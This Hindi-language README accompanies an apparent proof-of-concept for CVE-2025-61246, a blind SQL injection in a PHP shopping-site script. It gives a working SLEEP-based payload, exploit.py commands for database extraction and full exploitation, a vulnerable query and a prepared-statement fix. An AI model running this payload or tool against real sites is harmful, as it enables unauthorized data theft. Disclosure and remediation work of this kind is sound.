
CVE-2025-61246: SQL Injection vulnerability PoC in Online Shopping System PHP
यह रिपॉजिटरी CVE-2025-61246 के लिए एक प्रूफ ऑफ कॉन्सेप्ट (PoC) है, जो ऑनलाइन शॉपिंग सिस्टम PHP एप्लिकेशन में पाई गई एक गंभीर SQL इंजेक्शन भेद्यता है। यह भेद्यता एक अप्रमाणित हमलावर को समय-आधारित ब्लाइंड SQL इंजेक्शन के माध्यम से मनमाने SQL कमांड निष्पादित करने की अनुमति देती है।
/online-shopping-system-php-master/review_action.phpproIdभेद्यता review_action.php एंडपॉइंट में मौजूद है जहां proId पैरामीटर से उपयोगकर्ता द्वारा प्रदत्त इनपुट सीधे SQL क्वेरी में शामिल किया जाता है, बिना उचित स्वच्छता या पैरामीटरीकृत क्वेरी के। यह एक हमलावर को दुर्भावनापूर्ण SQL पेलोड इंजेक्ट करने की अनुमति देता है जो:
// Vulnerable code (example)
$proId = $_POST['proId'];
$query = "SELECT * FROM products WHERE id = " . $proId;
mysqli_query($conn, $query);
एक हमलावर इस भेद्यता का शोषण निम्नानुसार कर सकता है:
/online-shopping-system-php-master/review_action.php पर एक तैयार POST अनुरोध भेजनाproId पैरामीटर में एक दुर्भावनापूर्ण SQL पेलोड शामिल करनाproId=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -
इस रिपॉजिटरी में शामिल हैं:
exploit.py) - भेद्यता का पता लगाने और शोषण करने के लिए Python स्क्रिप्टMANUAL_TESTING.md) - मैन्युअल शोषण के लिए चरण-दर-चरण निर्देशdocker-compose.yml) - सुरक्षित परीक्षण के लिए Docker वातावरणREMEDIATION.md) - सुरक्षित कोडिंग प्रथाएं और पैचPython 3.7+
pip install -r requirements.txt
# Clone the repository
git clone https://github.com/hackergovind/CVE-2025-61246.git
cd CVE-2025-61246
# Install dependencies
pip install -r requirements.txt
# Run the exploit
python exploit.py --url http://target.com/online-shopping-system-php-master/review_action.php
# Detection only (no exploitation)
python exploit.py --url http://target.com/review_action.php --detect-only
# Extract database name
python exploit.py --url http://target.com/review_action.php --extract-db
# Full exploitation with custom timeout
python exploit.py --url http://target.com/review_action.php --timeout 10 --full-exploit
# Use proxy for testing
python exploit.py --url http://target.com/review_action.php --proxy http://127.0.0.1:8080
इस भेद्यता के सफल शोषण से निम्नलिखित परिणाम हो सकते हैं:
// Secure implementation using prepared statements
$proId = $_POST['proId'];
$stmt = $conn->prepare("SELECT * FROM products WHERE id = ?");
$stmt->bind_param("i", $proId);
$stmt->execute();
$result = $stmt->get_result();
विस्तृत उपचार चरणों के लिए, REMEDIATION.md देखें।
⚠️ महत्वपूर्ण: यह PoC केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। लेखक इस जानकारी के दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेता है। परीक्षण से पहले हमेशा उचित प्राधिकरण प्राप्त करें।
Govind Pratap Singh
यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।
जिम्मेदार प्रकटीकरण: यदि आप कोई सुरक्षा भेद्यता खोजते हैं, तो कृपया सार्वजनिक प्रकटीकरण से पहले विक्रेता को इसकी जिम्मेदारी से रिपोर्ट करें।